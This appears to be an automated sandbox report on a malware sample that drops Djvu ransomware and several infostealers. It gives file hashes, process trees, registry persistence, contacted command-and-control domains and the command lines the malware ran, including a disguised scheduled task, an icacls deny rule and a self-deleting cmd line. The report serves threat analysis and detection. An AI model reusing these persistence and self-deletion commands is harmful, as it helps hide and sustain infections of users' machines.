MD5 ea714a90e8e8d71a6071e03019c262f4
SHA1 7572c34d6515710b15d6e1db8ec7f1882859107e
SHA256 b27d89c4d824903556d6f31c2168d171b803daae90c01257b0fb76f8448140a3
SHA512 c6a37c6f932e3e372e0deac92bc33fe5ca61b26ca01d5fe7caf45e4077981bb61cffbf7383fdd850e8fa675de4a8254c42d522b4b25f30094da9bd9d353d7724

\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

MD5 58783e32d609b3420b0caca7d5eb106e
SHA1 6f091cb1fed8645ea56940c46de14b1c9012faff
SHA256 6a4b7731cefe60974b947ccd6f0c668962086ed89db1e580f99826dcb7fe5de7
SHA512 e641220787688756ca56189f50dcfcfa722e4c6177c054963c1f2deb0395b6f191c2cf691d5cae4fa95793cfc81fbe8c08b8c37129945ab5b975092fc4fbcb6c

\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

MD5 5d704f986a395b5f2678f61607eac6a9
SHA1 6c92032bd4de36ff08cef4f0d3a567fda5e3a240
SHA256 3a868d5273802c26f0844c8c92db0e91d70b9d5e8921aa44090a6ce3db2a68ec
SHA512 2a4979a5e3b5ac1ddbb35438825bb8c345ff939a1916a45076986d8efb9bd08fafde38eb1daa6c1ffea7d64330d9a8a1ed10b62df36a79af3ad2f46ca15963ea

\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

MD5 362f796939437d943cb1987096a0e546
SHA1 00a9f0be3bf1dffbe8f4afd82493c9012d32c732
SHA256 051a1685f8563008ec5be46ff8d02ad3df178d1273d0eb5e8a6692ad36d2da68
SHA512 f947cc63f53d3ce6e1fdc61ee73bc6b9c040a2845746e17fb8b4d2656f18e16c88155925971348f4241fc64412879196449f66bcca625f26d9801866aa572fd8

memory/2108-396-0x0000000009590000-0x00000000095D0000-memory.dmp

memory/308-399-0x0000000010000000-0x0000000010253000-memory.dmp

C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 646474805e0a482a64c8fb0fd24cc193
SHA1 e0f3f06273ece606c9f652b446473dcc90525279
SHA256 a35b75ae6391b97d77245a8f880ea94d31491c82b6856752a1351f58bcc965bd
SHA512 b0fb54455c5e9d20f61d9aef49969d9fb84fe89fde53ea42b4b01f4822a61308018a054c16277da6b8d91b3219c55deeaf8f568ac5a7b049e3aa2b6f64d53fb0

C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 fe17a11e16a4d19d2eeb2a5ec43f0af4
SHA1 de72611f201f3db4aa0d89bffab5b63bdc7a1895
SHA256 14a3e2ff433e197099978da1ac9b1cab0a6dd99a0dadde38a6696614ce349107
SHA512 1a6cc018e223ca0896f3d72023c1f6907d3e103f2fafb23c08d5c0a4a551d5e95cb11468482eba9dcfddc8bfc073316b7854faf6cca3af17069cb007ba5d2903

\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 4876ee75ce2712147c41ff1277cd2d30
SHA1 3733dc92318f0c6b92cb201e49151686281acda6
SHA256 bbfba2d40f48c16a53b5806555c08aff1982c3fe4a77964963edbab9d7e672ed
SHA512 9bf25d4d0dfebd287b0c84abb64612b3db00a26b0217490b35925e77487d6c872632c936cedf1205c46ecbf9d4dfc9bc7600bee05afc550b30ae0d0964c5afe9

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F40GDP7G8DKU5CA6L297.temp

MD5 15c5b56061b272e6034676f253ad2173
SHA1 035ae77b6861ed7867d0a4ffcb7ce9ceb9779fca
SHA256 4477b5a2da2a2ab427a595009af7276d888072a6cdbb9a4e3870e3ba3172131d
SHA512 d6bbb09f0d3a2815852116126163c3ec9eabcef4aaa634a7400ac3857a39596cf818f0217f85519971643350ff488aa0e5fb3ad64aadda5202e50e9ecc758ef0

memory/1828-419-0x0000000000680000-0x0000000000780000-memory.dmp

memory/1828-424-0x0000000000400000-0x00000000004AB000-memory.dmp

memory/2852-425-0x000000001B380000-0x000000001B662000-memory.dmp

C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll

MD5 ca684dc5ebed4381701a39f1cc3a0fb2
SHA1 8c4a375aa583bd1c705597a7f45fd18934276770
SHA256 b8c5ad09c5b62fa8d8bcb8e1c317700274b4756d04fc964ccae38103c318ddd2
SHA512 8b414799e37d50f664e04e704ab06a8f6f25cb9f9c24f157e998a72aad9c0a0cd9435b42c629dc26643f039725d22a89ca3468dc39009d11d910420a80e9c510

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-15 01:10

Reported

2024-03-15 01:15

Platform

win10-20240221-en

Max time kernel

300s

Max time network

299s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ab53deb9-ed78-4480-8153-4fc7e31f7c86\\1384.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\1384.exe N/A

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Lumma Stealer

stealer lumma

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

Vidar

stealer vidar

ZGRat

rat zgrat

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ab53deb9-ed78-4480-8153-4fc7e31f7c86\\1384.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\1384.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3324 wrote to memory of 4200 N/A N/A C:\Windows\system32\cmd.exe
PID 3324 wrote to memory of 4200 N/A N/A C:\Windows\system32\cmd.exe
PID 4200 wrote to memory of 4036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4200 wrote to memory of 4036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3324 wrote to memory of 2936 N/A N/A C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 3324 wrote to memory of 2936 N/A N/A C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 3324 wrote to memory of 2936 N/A N/A C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 2936 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 2936 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 2936 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 2936 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 2936 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 2936 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 2936 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 2936 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 2936 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 2936 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 3324 wrote to memory of 1400 N/A N/A C:\Users\Admin\AppData\Local\Temp\2335.exe
PID 3324 wrote to memory of 1400 N/A N/A C:\Users\Admin\AppData\Local\Temp\2335.exe
PID 3324 wrote to memory of 1400 N/A N/A C:\Users\Admin\AppData\Local\Temp\2335.exe
PID 1400 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\2335.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1400 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\2335.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1400 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\2335.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1400 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\2335.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1400 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\2335.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1400 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\2335.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1400 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\2335.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1400 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\2335.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1400 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\2335.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 428 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Windows\SysWOW64\icacls.exe
PID 428 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Windows\SysWOW64\icacls.exe
PID 428 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Windows\SysWOW64\icacls.exe
PID 428 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 428 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 428 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 4652 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 4652 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 4652 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 4652 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 4652 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 4652 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 4652 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 4652 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 4652 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 4652 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\Temp\1384.exe
PID 608 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe
PID 608 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe
PID 608 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe
PID 1232 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe
PID 1232 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe
PID 1232 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe
PID 1232 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe
PID 1232 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe
PID 1232 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe
PID 1232 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe
PID 1232 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe
PID 1232 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe
PID 1232 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe
PID 608 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build3.exe
PID 608 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build3.exe
PID 608 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\1384.exe C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build3.exe
PID 3324 wrote to memory of 224 N/A N/A C:\Users\Admin\AppData\Local\Temp\9CDA.exe
PID 3324 wrote to memory of 224 N/A N/A C:\Users\Admin\AppData\Local\Temp\9CDA.exe
PID 3324 wrote to memory of 224 N/A N/A C:\Users\Admin\AppData\Local\Temp\9CDA.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe

"C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CB3F.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\1384.exe

C:\Users\Admin\AppData\Local\Temp\1384.exe

C:\Users\Admin\AppData\Local\Temp\1384.exe

C:\Users\Admin\AppData\Local\Temp\1384.exe

C:\Users\Admin\AppData\Local\Temp\2335.exe

C:\Users\Admin\AppData\Local\Temp\2335.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\ab53deb9-ed78-4480-8153-4fc7e31f7c86" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\1384.exe

"C:\Users\Admin\AppData\Local\Temp\1384.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4064 -s 1164

C:\Users\Admin\AppData\Local\Temp\1384.exe

"C:\Users\Admin\AppData\Local\Temp\1384.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe

"C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe"

C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe

"C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 1652

C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build3.exe

"C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build3.exe"

C:\Users\Admin\AppData\Local\Temp\9CDA.exe

C:\Users\Admin\AppData\Local\Temp\9CDA.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A085.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\B352.exe

C:\Users\Admin\AppData\Local\Temp\B352.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 224 -s 1012

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 224 -s 944

C:\Users\Admin\AppData\Local\Temp\343B.exe

C:\Users\Admin\AppData\Local\Temp\343B.exe

C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build3.exe

"C:\Users\Admin\AppData\Local\3deb58d7-aa73-4e3d-bb7b-1db61bacb97b\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe" & del "C:\ProgramData\*.dll"" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 5

Network

Country Destination Domain Proto
US 8.8.8.8:53 trad-einmyus.com udp
RU 81.94.159.197:80 trad-einmyus.com tcp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 197.159.94.81.in-addr.arpa udp
US 8.8.8.8:53 sdfjhuz.com udp
BG 93.152.141.65:80 sdfjhuz.com tcp
US 8.8.8.8:53 65.141.152.93.in-addr.arpa udp
US 8.8.8.8:53 api.2ip.ua udp
US 104.21.65.24:443 api.2ip.ua tcp
US 8.8.8.8:53 sportessentia.home.pl udp
PL 79.96.138.166:443 sportessentia.home.pl tcp
US 8.8.8.8:53 166.138.96.79.in-addr.arpa udp
US 8.8.8.8:53 theonlyreasonwhywe.pro udp
US 172.67.218.191:443 theonlyreasonwhywe.pro tcp
US 8.8.8.8:53 m2reg.ulm.ac.id udp
ID 103.23.232.80:80 m2reg.ulm.ac.id tcp
US 8.8.8.8:53 wisemassiveharmonious.shop udp
US 8.8.8.8:53 colorfulequalugliess.shop udp
US 8.8.8.8:53 191.218.67.172.in-addr.arpa udp
US 8.8.8.8:53 24.65.21.104.in-addr.arpa udp
US 8.8.8.8:53 80.232.23.103.in-addr.arpa udp
US 8.8.8.8:53 61.179.17.96.in-addr.arpa udp
US 172.67.185.152:443 colorfulequalugliess.shop tcp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 152.185.67.172.in-addr.arpa udp
US 104.21.65.24:443 api.2ip.ua tcp
BG 93.152.141.65:80 sdfjhuz.com tcp
US 8.8.8.8:53 sajdfue.com udp
US 8.8.8.8:53 96.134.221.88.in-addr.arpa udp
KR 211.119.84.112:80 sajdfue.com tcp
KR 211.119.84.112:80 sajdfue.com tcp
US 8.8.8.8:53 112.84.119.211.in-addr.arpa udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.154.77:443 steamcommunity.com tcp
US 8.8.8.8:53 77.154.214.23.in-addr.arpa udp
DE 5.75.208.156:80 5.75.208.156 tcp
US 8.8.8.8:53 156.208.75.5.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
RU 81.94.159.197:80 trad-einmyus.com tcp
US 8.8.8.8:53 resergvearyinitiani.shop udp
